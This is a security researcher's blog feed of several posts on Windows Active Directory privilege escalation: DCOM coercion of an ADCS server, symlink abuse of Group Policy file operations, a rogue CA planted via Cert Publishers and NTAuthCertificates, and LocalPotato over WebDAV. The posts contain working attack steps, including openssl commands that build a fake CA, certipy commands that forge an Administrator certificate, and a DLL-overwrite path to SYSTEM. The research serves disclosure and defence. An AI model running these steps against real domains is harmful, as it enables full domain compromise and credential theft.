Normal view

There are new articles available, click to refresh the page.
Before yesterdayDecoder's Blog

Hello: I’m your ADCS server and I want to authenticate against you

By: Decoder
26 February 2024 at 15:50

In my exploration of all the components and configurations related to the Windows Active Directory Certification Services (ADCS), after the “deep dive” in Cert Publishers group, I decided to take a look at the “Certificate Service DCOM Access” group.

This group is a built-in local security group and is populated by the special NT AUTHORITY\Authenticaterd Users identity group, which represents every Domain user account that can successfully log on to the domain, whenever the server assumes the role of a Certification Authority (CA) server by installing the Active Directory Certification Services (ADCS) role.

The “DCOM Access” is somewhat intriguing; it evokes potential vulnerabilities and exploitation 😉

But let’s start from the beginning. What’s the purpose of this group? MS says: “Members of this group are allowed to connect to Certification Authorities in the enterprise“.

In simpler terms, this group can enroll certificates via DCOM. Thus, it’s logical that all authenticated users and computers have access to the specific application.

Each time a user or computer enrolls or auto enrolls a certificate, it contacts the DCOM interfaces of the CertSrv Request application which are exposed through the MS-WCCE protocol, the Windows Client Certificate Enrollment Protocol.

There is also a specific set of interfaces for Certificate Services Remote Administration Protocol described in MS-CSRA.

I won’t delve into the specifics of these interfaces. Maybe there are interesting interfaces to explore and abuse, but for now, my focus was drawn to the activation permissions of this DCOM server.

The DCOMCNFG tool provides us a lot of useful info.

At the computer level, the Certificate Service DCOM Access group is “limited” to Local and Remote Launch permissions:

This does not mean that this group can activate all the DCOM objects, we have to look at the specific application, CertSrv Request in our case:

Everyone can activate from remote this DCOM server. To be honest, I would have expected to find the Certificate Service DCOM Access group here instead of Everyone, given that this group is limited to Local Launch and Local Activation permissions:

Maybe some kind of combined permissions and nested memberships are also evaluated.

There’s another interesting aspect as well: from what I observed, the Certificate Service DCOM Access group is one of the few groups, along with Distributed COM Users and Performance Log Users, that are granted Remote Activation permissions.

Let’s take a look at identity too:

This DCOM application impersonates the SYSTEM account, which is what we need because it represents the highest local privileged identity.

So, we have a privileged DCOM server running that can be activated remotely by any authenticated domain user. This seems prone to our loved *potato exploits, don’t you think?

In summary, most of these exploits rely on abusing a DCOM activation service, running under a highly privileged context, by unmarshalling an IStorage object and reflecting the NTLM authentication back to a local RPC TCP endpoint to achieve local privilege escalation.

There are also variants of this attack that involve relaying the NTLM (and Kerberos) authentication of a user or computer to a remote endpoint using protocols such as LDAP, HTTP, or SMB, ultimately enabling privilege escalation up to Domain Admin. And this is what @splinter_code and I did in our RemotePotato0.

But this scenario is different, as a low-privileged domain user, we want to activate a remote DCOM application running under a high-privileged context and force it to authenticate against a remote listener running on our machine so that we can capture and relay this authentication to another service.

We will (hopefully) get the authentication of the remote computer itself when the DCOM application is running under the SYSTEM or Network Service context.

Sounds great! l Now, what specific steps should we take to implement this?

Well, it is much simpler than I initially thought 🙂

Starting from the original JuicyPotato I made some minor changes:

  • Set up a redirector (socat) on a Linux machine on port 135 to redirect all traffic on our attacker machine on a dedicated port (ex: 9999). You certainly know that we can no longer specify a custom port for Oxid Resolution 😉 .
  • In JuicyPotato code:
    • Initialize a COSERVERINFO structure and specify the IP address of the remote server where we want to activate the DCOM object (the ADCS server)
    • Initialize a COAUTHIDENTITY and populate the username, password, and domain attributes.
    • Assign the COAUTHIDENTITY to the COSERVERINFO structure
    • In IStorageTrigger::Marshallfinterface specify the redirector IP address
    • In CoGetInstanceFromIStorage() pass the the COSERVERINFO structure:

And yes it worked 🙂 Dumping the NTLM messages received on our socket server we can see that we get an authentication type 3 message from the remote CA server (SRV1-MYLAB):

The network capture highlights that the Remote Activation requested by our low-privileged user was successful:

The final step is to forward the NTLM authentication to an external relay, such as ntlmrelayx, enabling authentication to another service as the CA computer itself.

Last but not least, since we have an RPC Client authenticating, we must encapsulate and forward the authentication messages using a protocol already implemented and supported in ntlmrelayx, such as HTTP.

I bet that now the fateful question arises:

Ok, regular domain users can coerce the authentication of an ADCS server from remote, intercept the authentication messages, and relay it, but is this really useful?

Well, considering the existence of other unpatched methods to coerce authentication of a Domain Controller, such as DFSCoerce, I would argue its utility may be limited.

To complicate matters further, the only protocols that can be relayed, due the the hardening MS recently made in DCOM, at the moment are HTTP and SMB (if signing is not required).

In my lab, I tested the relay against the HTTP /CertSrv endpoint of a CA web enrollment server running on a different machine (guess why?… you cannot relay back to the same machine over the network). With no NTLM mitigations in place, I requested a Machine certificate for the CA server.

The attack flow is shown below:

With this certificate, I could then log onto the ADCS server in a highly privileged context. For example, I could back up the private key of the CA, ultimately enabling the forging of certificates on behalf of any user.

The POC

I rewrote some parts of our old JuicyPotato to adapt it to this new scenario. It’s a quick & dirty fix and somehow limited, but it was more than enough to achieve my goal 🙂

You can get rid of the socat redirector by using our JuicyPotatoNG code and implement a fake Oxid Resolver like we did in RemotePotato0, with the extra bonus that you can also control the SPN and perform a Kerberos relay too… but I’ll leave it up to you 😉

Source Code: https://github.com/decoder-it/ADCSCoercePotato/

Conclusions

While the method I described for coercing authentication may not be groundbreaking, it offers interesting alternative ways to force the authentication of a remote server by abusing the Remote Activation permission granted to regular domain users.

This capability is only limited to the Certificate Service DCOM Access group, which is populated only when the ADCS service is running. However, there could be legacy DCOM applications that grant Remote Activation to everyone.

Imagine DCOM Applications running under the context of the “Interactive User” with Remote Activation available to regular users. With cross-session implementation, you could also retrieve the authentication of a logged-in user 😉

Another valid reason to avoid installing unnecessary services on a Domain Controller, including the ADCS service!

That’s all 🙂

Do not trust this Group Policy!

By: Decoder
23 January 2024 at 08:03

Sometimes I think that starting with a hypothetical scenario can be better than immediately diving into the details of a vulnerability. This approach, in my opinion, provides crucial context for a clearer understanding, especially when the vulnerability is easy to understand but the scenario where it could apply is not.

This post is about possible abuse of a group policy configuration for Local Privilege Escalation, very similar to the one I already reported and MS fixed with CVE-2022-37955.

First scenario

So we have our Active Directory domain MYLAB.LOCAL with several Group Policies. Any domain user can by default access the SYSVOL share, stored in this case \\mylab.local\sysvol\mylab.local\Policies, and read the configurations of the group policies.

At some point, our attention is caught by a “Files” preference group policy identified by the Files.xml file and located under the Machine context:

The Files policy is used for performing file operations such as copying or deleting one or more files from a source folder to a destination folder. The source and destination can be paths or UNC names and the operation can be performed under the Machine context or the logged-on user context if you specify it.

What actions does this policy perform on files? A thorough analysis of the contents of Files.xml can offer a clear understanding:

The configuration specifies that the file agentstartup.log, residing in the local C:\ProgramData\Agent\Logs directory, should be copied to a hidden server share logfilecollector$ within the agentstartup folder on the server. The destination filename on the server will be derived from the computer name.

This policy has been configured to copy the log files produced during the startup phase of an agent running on the domain computers to a centralized location. Alternatively, a group policy startup script executing identical copy operations could also be employed and would yield the same outcome.

When will the policy be processed? Running under the Machine context, at startup, and also on demand by performing a gpudate /force command. This share should be writable by the computer accounts where the policy is applied.

This is how the policy, configured by an administrator, would look like:

And this is how the file server should have been configured. In this case, the directory located on the share is accessible by Domain Users in read-only but Domain Computers have modify permissions as expected:

There’s also another interesting user logfileoperator who also has modify permissions:

This account is responsible for managing log files. As a Domain User we can also look at the contents of the folder:

The policy is also applied to the file server share which hosts the destination files.

By putting all the pieces together the question is: what potential consequences could arise if this user account, logfileoperator, is compromised by an attacker? Is there any possibility of privilege escalation?

The logfileoperator account can rdp to the file server (SRV1-MYLAB in this case) as a low-privileged user for performing his maintenance tasks.

Let’s assume that our attacker, impersonating logfileoperator  gains access to SRV1-MYLAB

Let’s check the source directory:

The default security settings of the ProgramData directory have not been modified, so low-privileged users can modify the contents of the Logs directory…

This scenario would be perfect for a very simple and easy escalation path by abusing the well-known symlinks creation via NTObjectmanager tricks.

To summarize:

  • Delete c:\programdata\Agent\Logs\agentstartup.log
  • Put a malicious dll in this folder and name it agentstartup.log
  • Delete contents of c:\logfilecollector\agentstartup
  • create a symlink for the target file SRV1-MYLAB.log pointing to destination C:\windows\System32\myevil.dll
  • Performing then a gpupdate /force will trigger the group policy which will copy our malicious agentstartup.log by following the symlink configured in SRV1-MYLAB.log to the destination c:\windows\system32\myevil.dll with SYSTEM privileges, given that the entire file copy operation is performed locally under the Machine context.

However, we currently face an issue. A few years ago, MS introduced the “Redirection Trust” feature to address redirection attacks, particularly during group policy processing. This feature prevents a privileged process from reparsing a mount point created by a lower privileged process:

In Group Policy Client policy service (gpsvc) this feature is enforced.

But wait, our destination file is specified as UNC share and not a local drive, will Redirection Trust still work in this local scenario?

Guess what, it does not work! Our dll has been successfully copied:

We can see the successful operations in Procmon tool:

It turns out that the mitigation is not effective on shares. James Forshaw already mentioned this in an old tweet:

Yes, it works on all the newest and updated versions of Windows as of now, Insider builds included:

And no, I won’t explain again how someone could misuse an arbitrary file write with SYSTEM privileges. 😉

Second Scenario

Let’s explore another hypothetical scenario. This time the administrator has setup this Folder policy:

The policy, executed within the user configuration, will remove the logs folder along with all its files and subfolders located on the share \\127.0.0.1\EXPORTS\%username%, dynamically expanded to match the currently logged-in user.

The question arises: why does this configuration involve the localhost share?

Consider a scenario in our domain where a special folder containing user data is shared on all domain computers. The share name is \\<computername>\exports\<username>, but the physical path may vary for each computer. At some point, there is the requirement to create a policy for deleting a folder under this share (in this case, “logs”). The Folder preference suits our needs perfectly, but we want to use only one policy configuration and avoid specifying the physical path, which can differ. Instead, we opt for using the common share name \\127.0.0.1\… (localhost).

By default, the delete operation is performed under the SYSTEM account (unless configured to run under the user’s context). This default behavior aligns with our requirement, ensuring a sure folder removal.

But again, this could lead to abuse, right? What if we redirect the folder to be deleted to a target folder inaccessible to the user?

Let’s see what could happen:

Our user has his own shared folder and contents are under his control.

In this scenario, our previous c:\programdata\Agent contains also another subdirectory Updater that stores the executable for the Agent updater and is obviously read-only for users, as opposed to the parent folder Agent, because the updater runs with SYSTEM privileges….

So what’s the possible abuse? Can we transform an arbitrary folder delete to a privilege escalation? Let’s try it by creating a junction pointing to the c:\programdata\agent and perform gpupdate:

It worked as expected, a share was specified as the target folder and redirection mitigation did not work, so we were able to delete also the Updater folder. Now the last step would be to recreate the Updater folder, put a malicious exe inside, name it AgentUpdater.exe, trigger or wait for our agent to perform and update and we have SYSTEM access…

Conclusions

This was merely a hypothetical scenario, but I presume there are other real-world situations very similar to this, don’t you agree?

For example if “Group Policy Logging and Tracing” log files are saved on a shared folder:

Hint: when log file size exceeds 1024kB it will be saved as .bak and a new log file will be created. However, I’ll leave this exercise to the reader 😉

There is one limitation to exploiting this security bypass. The shared folder that will be redirected and contains the symlink must be a subfolder of the share; otherwise, you will encounter a “device not ready” error.

Should this be considered a misconfiguration vulnerability or software (ie: logic bug) vulnerability?

Hard to say, I obviously reported this to MSRC:

  • December 29, 2023: Initial submission.
  • January 11, 2024: MSRC responded, stating that the case did not meet the criteria for servicing as it necessitates “Administrator and extensive user interaction.” (????) They closed the case but indicated a possibility of revisiting it if additional information impacting the investigation could be provided.
  • January 11, 2024: I answered, providing a more detailed explanation of the scenario and attached a video. I emphasized that it does not require administrator interaction, as the issue revolves around exploiting an existing group policy with this configuration. Side note: If someone could clarify what MSRC means by “Administrator interaction is required”, I would be more than happy to correct my post and give due mention
  • January 15, 2024: No response from MSRC. I sent an email with the draft of this post attached, informing them that my intention is to publish it in the absence of their feedback
  • January 22, 2024: MSRC told me that “they looked over the article and had no concerns or corrections”. Cool, appreciate it 🙂
  • January 23, 2024: Post published.

I find it perplexing that MSRC couldn’t offer a more comprehensive justification for their decision, instead of the given one that implies it would need Administrator (???) interaction.

Well, it is what it is, I won’t be organizing a dramatic exit just because of this tiny inconvenience 😉

If MS won’t (silently) fix this issue here are my 2 cents to save the world from potential catastrophe:

  • Carefully evaluate permissions on source and destination files/folders when performing operations that involve creation or deletion operations via group policy
  • If the destination is a share, a red flag should be raised. Possibly avoid this configuration, if really necessary, follow the whole process logic and ask yourself at each step if it could be abused by placing a redirection.

That’s all 🙂 ..and thanks to Robin @ipcdollar1 for the review

A “deep dive” in Cert Publishers Group

By: Decoder
20 November 2023 at 17:03

While writing my latest post, my attention was also drawn to the Cert Publishers group, which is associated with the Certificate service (ADCS) in an Active Directory Domain.

I was wondering about the purpose of this group and what type of permissions were assigned to its members. I was also curious to understand if it was possible to exploit this membership to acquire the highest privileges within a domain. By default, this group contains the computer accounts hosting the Certification Authority and Sub CA. It is not clear whether this group should be considered really highly privileged, and I have not found any documentation of potential abuse. For sure, CA and SubCA Windows servers should be considered highly privileged, even just for the fact that they can do backups of the CA keys…

Last but not least, Microsoft does not protect this group by AdminSDHolder:

What is the purpose of Cert Publishers?

Microsoft’s official documentation on this group is not very clear nor exhaustive:

Members of the Cert Publishers group are authorized to publish certificates for User objects in Active Directory.

What does this mean? Members of the group have write access to the userCertificate attribute of users and computers and this permission is also controlled by the AdminSDholder configuration:

The userCertificate attribute is a multi-valued attribute that contains the DER-encoded X509v3 certificates issued to the user. The public key certificates issued to this user by the Microsoft Certificate Service are stored in this attribute if the “Publish to Active Directory” is set in the Certificate Templates, which is the default for several certificate templates:

Should you accept this default setting? In theory, this would be useful when using Email Encryption, Email Signing, or Encrypted Files System (EFS). I see no other reason and if you don’t need it remove this flag 😉

From the security perspective, as far as I know, no reasonable path could permit an attacker to elevate the privileges by altering the certificates stored in this attribute.

There could be in theory a denial of service attack by adding a huge amount of certificates to the attribute to create replication issues between DC’s, but in my tests, I was not able to reproduce this given that there seems to be a hard limit of around 1200 certificates (or maybe a limit on the size), at least in a Windows AD 2016.

So if you really need this attribute, at least check “Do not automatically reenroll..” which will prevent uncontrolled growth of this attribute.

Is there anything else they can do? Yes!

Permissions granted to cert Publishers in Configuration Partition

Cert Publishers have control over some objects located under the “Public Key Services” container of Configuration Partition of AD:

  • CN=AIA,CN=Public Key Services,CN=Services,CN=Configuration,DC=…

Authority Information Access (AIA) is used to indicate how to access information and services related to the issuer of the certificate.

From Pkisolutions:

This container stores the intermediate CA and cross-certificates. All certificates from this container are propagated to each client in the Intermediate Certification Authority certificates store via Group Policy.

Cert Publishers have full control over it, so they can create new entries with fake certificates via certutil or adsiedit, for example:

certutil -dspublish -f fakeca.crt subCA  (sub CA)
certutil -dspublish -f fakeca.crt crossCA  (cross CA)

But the resulting published fake certificates in the intermediate CA will not be trusted due to missing root CA, so probably that is not useful…
We have also to keep in mind that Cert Publishers cannot modify the original AIA object created during the installation of the CA:

  • CN=[CA_NAME],CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC= …

Certificate Revocation List Distribution Point (CDP) provides information on where to find the CRL associated with the certificate.

Members of Cert Publishers have full control over this container and subsequent objects. But what’s the purpose of this container in ADCS?

From Pkisolutions:
“This container is used to store certificate revocation lists (CRL). To differentiate CRLs a separate container is created for each CA. Typically CA host NetBIOS name is used. CRLs from CDP containers are NOT propagated to clients and is used only when a certificate refers to a particular CRLDistributionPoint entry in CDP container.”

Members could overwrite attributes of the existing object, especially the certificateRevocationList and deltaRevocationList attribute with a fake one or just remove it. However given that these configurations are not replicated to clients, these permissions are not very useful from an attacker’s perspective.

It’s worth noting that Cert Publishers cannot modify the extensions relative to AIA/CDP configuration of the CA server:

  • CN=[CA_NAME],CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=..

This container stores trusted root certificates. The root certificate of the CA server is automatically placed inside and the certificates will be published (via GP) under the trusted root certification authorities.

While Cert Publishers have full control over the CA_NAME object, they are unable to add other certification authority objects. This restriction is probably in place to mitigate the risk of a malicious user, who is a member of the group, from publishing fake CA certificates. Such fake certificates could potentially be trusted by all clients. Hence, what are the potential abuse scenarios to consider?

Abusing the Certification Authorities object

My objective was to explore potential workarounds to have my fake Certificate Authority (CA) published and accepted as trustworthy by all clients, despite the established limitations.

Following various tests, where I attempted to substitute the existing certificate stored in the caCertificate attribute of the CA object with a fake one or add to the current caCertificate a fake certificate (without success, as the fake CA was not published), I eventually identified a solution that circumvents the existing ‘safety’ (or should we say ‘security’?) boundary. Why just not creating a fake one with the exact same common name as the official CA? If it works as expected, it would be appended to the existing CA’s configuration…

Creating a fake self-signed CA with the openssl tool is fairly straightforward, I won’t go into details as I already explained this in my previous post.

The provided common name matches the name of our official CA.

After obtaining the certificate, we will log in to the AD domain using the credentials of a user who is a member of Cert Publishers and proceed to add the certificate to the Certification Authorities container

We can safely ignore the error, and with adsiedit we can confirm that the certificate was added:

Let’s see if it works, but instead of waiting for the GPO refresh, we manually perform a gpupdate /force and look in the certificates of the local computer/user:

Bingo! We now have our fake Certificate Authority (CA) established as a trusted entity. To confirm its functionality, we’ll configure a web server with an SSL certificate issued by our CA.

In my instance, I used an IIS web server and requested an SSL certificate (you can do this in many different ways..) using the Certificates snap-in (I’ll omit some steps, as there is a huge documentation available on how to accomplish this)

Once we get our csr file (evil.csr), we need to setup the CA configuration for the CRL endpoints and certificate signing.

[ca]
default_ca = EVILCA
[crl_ext]
authorityKeyIdentifier=keyid:always
[EVILCA]
dir = ./
new_certs_dir = $dir
unique_subject = no
certificate = ./evilca.crt
database = ./certindex
private_key = ./evilca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
default_md = sha256
copy_extensions = copy
[myca_policy]
commonName = supplied
stateOrProvinceName = optional
countryName = optional
emailAddress = optional
organizationName = supplied
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

Run the usual commands:

openssl genrsa -out cert.key 2048
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile evilca.crt
openssl ca -config ca.conf -gencrl -keyfile evilca.key -cert evilca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

We are now ready to process the certificate request:

And import the evil.crt on our webserver. From a domain joined machine, we try to navigate to https://myevilserver.mylab.local:

As expected, the site is trusted by our fake CA.

With forged trusted certificate could empower a malicious actor to execute various attacks, potentially resulting in the compromise of the entire domain by enrolling any type of certificates which will be then trusted…

While not an expert on these abuses, the following are initial considerations:

  • Man in the middle (MITM) attacks such as SSL inspection to decrypt all the traffic
  • Code signing of malicious enterprise applications or script
  • Server authentication, VPN,…

Moving further

But let’s go a set further. Remember my so-called Silver Certificate?

To be able to (ab)use a forged client certificate for authentication, via PKINIT or Schannel, the CA also has to present in NTAuthcertificates store.

Let’s consider the scenario where the Cert Publishers group is granted write access to the NTAuthcertificates object. While not the default setting, I’ve encountered a couple of real-world scenarios where this (mis)configuration was implemented. This transforms the original situation described in my previous post, by having only write permission on NTAuthcertificates, from a mere persistence technique to a genuine privilege escalation. This shift is noteworthy, especially considering that we already have a trusted Certificate Authority at our disposal, enabling the forging of client certificates.

All we need at this point is to add our fake CA certificate to the NTAuthcertificates object (assuming Cert Publishers have been granted this permission)

Let’s wait for the GP refresh on the Domain Controllers and then proceed as usual using for example the certipy tool:

certipy forge -ca-pfx evilca.pfx -upn [email protected] -subject 'CN=Administrator,CN=Users,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21

And get the expected result!

Conclusions

At the end of our experiments, we can derive the following conclusions:

  • Members of Cert Publishers can add a malicious Certification Authority under the control of an ADCS environment and subsequently be trusted by all the clients. While certificates issued under this CA will not be automatically trusted for client authentication via PKINIT or SChannel, they could still be abused for other malicious tasks.
  • Cert Publishers membership + write access to NTAuthcertificates is the most dangerous mix in these scenarios. You can then forge and request a certificate, the Silver++ 🙂 , for client authentication against any user in the domain.
  • Cert Publishers should be considered High-Value Targets (or Tier-0 members), and membership in this group should be actively monitored, along with possible attack paths originating from non-privileged users leading to this group.

That’s all 😉

LocalPotato HTTP edition

By: Decoder
3 November 2023 at 16:54

Microsoft addressed our LocalPotato vulnerability in the SMB scenario with CVE-2023-21746 during the January 2023 Patch Tuesday. However, the HTTP scenario remains unpatched, as per Microsoft’s decision, and it is still effective on updated systems.

This is clearly an edge case, but it is important to be aware of it and avoid situations that could leave you vulnerable.

In this brief post, we will explain a possible method of performing an arbitrary file write with SYSTEM privileges starting from a standard user by leveraging the context swap in HTTP NTLM local authentication using the WEBDAV protocol.

For all the details about the NTLM Context swapping refer to our previous post.

Lab setup

First of all, we need to install IIS on our Windows machine and enable Webbav, The following screenshot is taken from Windows 11, but is quite similar on Windows servers as well.

Upon enabling WEBDAV, the next step is to create a virtual directory under our root website. In this instance, we’ll name it webdavshare and mount it, for the sake of simplicity, on the C:\Windows directory.

We need to permit read/write operations on this share by adding an authoring rule:

Last but not least, we need to enable NTLM authentication and disable all the other methods:

Exploiting context swapping with http/webdav

In our latest LocalPotato release, we have added and “hardcoded” this method with http/webdav protocol. The tool will perform an arbitrary file write with SYSTEM privileges in the location specified in the webdav share with a static content of “we always love potatoes”. Refer to the source code for all the details, it’s not black magic 🙂

You can certainly modify the code and tailor it to your specific needs, depending on the situation you encounter 😉

From NTAuthCertificates to “Silver” Certificate

By: Decoder
5 September 2023 at 16:22

In a recent assessment, I found that a user without special privileges had the ability to make changes to the NTAuthCertificates object. This misconfiguration piqued my curiosity, as I wanted to understand how this could potentially be exploited or misused.

Having write access to the NTAuthCertificates object in Windows Active Directory, which is located in the Configuration Partition, could potentially have significant consequences, as it involves the management of digital certificates used for authentication and security purposes.

The idea behind a possible abuse is to create a deceptive self-signed Certification Authority (CA) certificate and include it in the NTAuthCertificates object. As a result, any fraudulent certificates signed by this deceptive certificate will be considered legitimate. This technique, along with the Golden Certificate, which requires the knowledge of the Active Directory Certification Server (ADCS) private key, has been mentioned in the well-known research Certified Pre-Owned published a couple of years ago.

In this blog post, I will document the necessary steps and prerequisites needed for forging and abusing authentication certificates on behalf of any user obtained from a fake CA.

So this is the scenario, reproduced in my lab with the adsiedit.exe tool

If you prefer to do it with the command line, in this case, Powershell, with the ActiveDirectory module installed:

$user = Get-ADuser user11
$dn="AD:CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=mylab,DC=local"
$acl = Get-Acl $dn
$sid = $user.SID
$acl.AddAccessRule((New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid,"GenericAll","ALLOW",([GUID]("00000000-0000-0000-0000-000000000000")).guid,"All",([GUID]("00000000-0000-0000-0000-000000000000")).guid))
Set-Acl $dn $acl
(get-acl -path $dn).access

Now that we are aware that our user (user11 in this case), has control over this object, we first need to create a fake self-signed Certification Authority. This can be easily done with openssl tools.

#generate a private key for signing certificates:
openssl genrsa -out myfakeca.key 2048
#create and self sign the root certificate:
openssl req -x509 -new -nodes -key myfakeca.key -sha256 -days 1024 -out myfakeca.crt

When self signing the root certificate you can leave empty all information you will be asked for, except the common name which should reflect your fake CA name as shown in the figure below:

We need to add the public key of our fake CA (myfakeca.crt) in the cACertificate attribute stored in NTAuthCertificates object, which defines one or more CA that can be used during authentication. This can be done easily with the default certutil tool:

Let’s check if it worked:

Yes, it worked. We have now 2 entries! Now that we have added our fake CA cert, we also need to create the corresponding pfx file which will be used later in the exploitation tools.

cat myfakeca.key > myfakeca.pem
cat myfakeca.crt >> myfakeca.pem
openssl pkcs12 -in myfakeca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out myfakeca.pfx

Everything is set up, so we could try to forge a certificate for authenticating the Domain Admin. In this example, we will use the certipy tool, but you could also use the ForgeCert tool on Windows machines

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'

Once we get the forged cert let’s try to authenticate:

certipy auth -pfx administrator_forged.pfx -dc-ip 192.168.212.21
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[] Using principal: [email protected] [] Trying to get TGT…
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)

Hmmm, this was somehow expected. The certificate is not trusted, probably we need to add our fake CA to the trusted certification authorities in the DC. But wait, this means that you need high privileges in order to do this, so we have to abandon the idea of kind of privilege escalation and think about this technique as a possible persistence mechanism. Let’s add it to the DC:

Bad news,wehen we try to authenticate again, we still get the error message KDC_ERROR_CLIENT_NOT_TRUSTED

What’s happening? Well, maybe the change in NTAuthCertificates has not been reflected on the DC’s local cache (we updated it as a standard user on a domain-joined PC) which is located under the registry key:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

On the DC, we have only one entry that corresponds to the legitimate CA. Normally this entry is aligned with the group policy update, so we could force the update without waiting for the next run (had some issues as it did not always work, needs more investigation) or run certutil to populate the cache:

Looks good, so now it should work. But guess what, bad news again! KDC_ERROR_CLIENT_NOT_TRUSTED

What’s still wrong? After some research, I figured out that maybe I have a problem with the Certification Revocation List (CRL) which is checked on a regular basis, at least the first time we use a certificate produced by the new CA. So we have to configure a CRL distribution point for my fake CA, which luckily can be done using again openssl ;).

First of all, we need to create a ca.conf file. I did this on my Linux box.

[ca]
default_ca = MYFAKECA
[crl_ext]
authorityKeyIdentifier=keyid:always
[MYFAKECA]
unique_subject = no
certificate = ./myfakeca.crt
database = ./certindex
private_key = ./myfakeca.key
serial = ./certserial
default_days = 729
default_md = sha1
policy = myca_policy
x509_extensions = myca_extensions
crlnumber = ./crlnumber
default_crl_days = 729
[myca_policy]
commonName = supplied
stateOrProvinceName = supplied
countryName = optional
emailAddress = optional
organizationName = supplied
organizationalUnitName = optional
[myca_extensions]
basicConstraints = CA:false
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always
keyUsage = digitalSignature,keyEncipherment
extendedKeyUsage = serverAuth
crlDistributionPoints = URI:http://192.168.1.88/root.crl

We need to run some openssl commands to produce the necessary files:

openssl genrsa -out cert.key 2048
#ensure that common name is different from your fake CA
openssl req -new -key cert.key -out cert.csr
touch certindex
echo 01 > certserial
echo 01 > crlnumber
openssl ca -batch -config ca.conf -notext -in cert.csr -out cert.crt
openssl pkcs12 -export -out cert.p12 -inkey cert.key -in cert.crt -chain -CAfile myfakeca.crt
openssl ca -config ca.conf -gencrl -keyfile myfakeca.key -cert myfakeca.crt -out rt.crl.pem
openssl crl -inform PEM -in rt.crl.pem -outform DER -out root.crl

Finally have our root.crl file, all we need is to setup a minimalistic HTTP server:

python3 -m http.server 80

In certipy we need to specify our CRL distribution point:

certipy forge -ca-pfx myfakeca.pfx -upn [email protected] -subject 'CN=Administrator,OU=Accounts,OU=T0,OU=Admin,DC=mylab,DC=local' -crl 'http://192.168.1.88/root.crl'
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Saved forged certificate and private key to 'administrator_forged.pfx'
certipy auth -pfx administrator_forged.pfx  -dc-ip 192.168.212.21

Bingo! It works, the DC is contacting our CRL distribution point and we are able to authenticate via PKINIT as a domain admin and get his NT hash…. Let’s do it with rubeus

It worked again! Let’s check if we can access the C$ share on the DC now:

At the conclusion of our experiment, we can draw the following conclusions

  • Having only write access to NTAuthCertificates is obviously not sufficient to perform a privilege escalation by using forged certificates issued by a fake CA for authentication. You might end up creating client authentication issues by removing the legitimate CA certificate from NTAuthCertificates
  • You need to add the fake CA to the trusted Certification Authorities and ensure that the local cache is populated on target Domain Controller
  • On a machine under your control, you need to set a CRL distribution point (not sure if this can be skipped)
  • As I mentioned, this is a persistence technique that is not very stealthy, you can for example monitor events logs 4768 and verify the Certificate Issuer Name, monitor NTAuthCertificates object changes, etc…

And this is why, just for fun, I called this the “Silver” certificate 😉

EoP via Arbitrary File Write/Overwite in Group Policy Client “gpsvc” – CVE-2022-37955

By: Decoder
16 February 2023 at 14:11

Summary

A standard domain user can exploit Arbitrary File Write/Overwrite with NT AUTHORITY\SYSTEM under certain circumstances if Group Policy “File Preference” is configured. I reported this finding to ZDI and Microsoft fixed this in CVE-2022-37955

Versions Affected

Tests (April 06, 2022) were conducted on the following Active Directory setup:

  • Domain computer: Windows 10/Windows 11 & Windows Insider 11/Windows Member Server 2022,  latest releases and fully patched
  • Domain controller: Windows Server 2016/2019/2022 with Active Directory functional level 2016

Prerequisites                          

A  Files preference Domain Group Policy has to be configured.

According to Microsoft this policy allows you to:

If such a policy is configured and a standard user has write access to the source and destination folder (not so uncommon scenario), it is possible to perform file write/overwrite with SYSTEM privileges by abusing symlinks thus elevating privileges to Administrator/SYSTEM.

A standard user can easily verify the presence and configuration of such a policy by looking for “Files.xml” in the SYSVOL share of the domain controllers.

GPO Setup

To achieve the arbitrary file write exploitation, it is required to create a new Group Policy “File Preference”

In the following screenshot the setup of the policy:

In this example, the policy will copy the file source.dat from c:\sourcedir to dest.dat in c:\destdir.

The key point here is that these operations are performed without impersonation, running under the SYSTEM context.

Arbitrary File Write                              

Due to the incorrect handling of links created via Windows Objectmanager’s symbolic links, it is possible to exploit this operation and place user-controlled content in any System protected location.

Exploitation steps

  1. Create the directories if they do not exist and ensure “destdir” is empty
  2. Copy a malicious dll/exe or whatever in c:\sourcedir with the name “source.dat”
  3. Create a symbolic link pointing destination  destdir/file to a system-protected directory:
  4. Perform a gpupdate /force

As can be noticed from the previous screenshot, the domain user was able to copy a file in a system protected directory by controlling the contents and the name.  The screenshot of “procom” tool confirms the operations:

Having the possibility to create a user-controlled file in protected directories opens endless privilege escalation possibilities. One of the easiest ways is to overwrite “Printconfig.dll” located in “C:\Windows\System32\spool\drivers\x64\3” with the malicious dll, and instantiate the PrintNotify object which will force the service to load our malicious PrintConfig.dll, granting us a SYSTEM shell:

To replicate the findings reported in this report, Defender was disabled.

Possible causes

A possible root problem can be identified within the function located in gpprefcl.dll which does not properly check the presence of junction points and symlinks:

The Fix                           

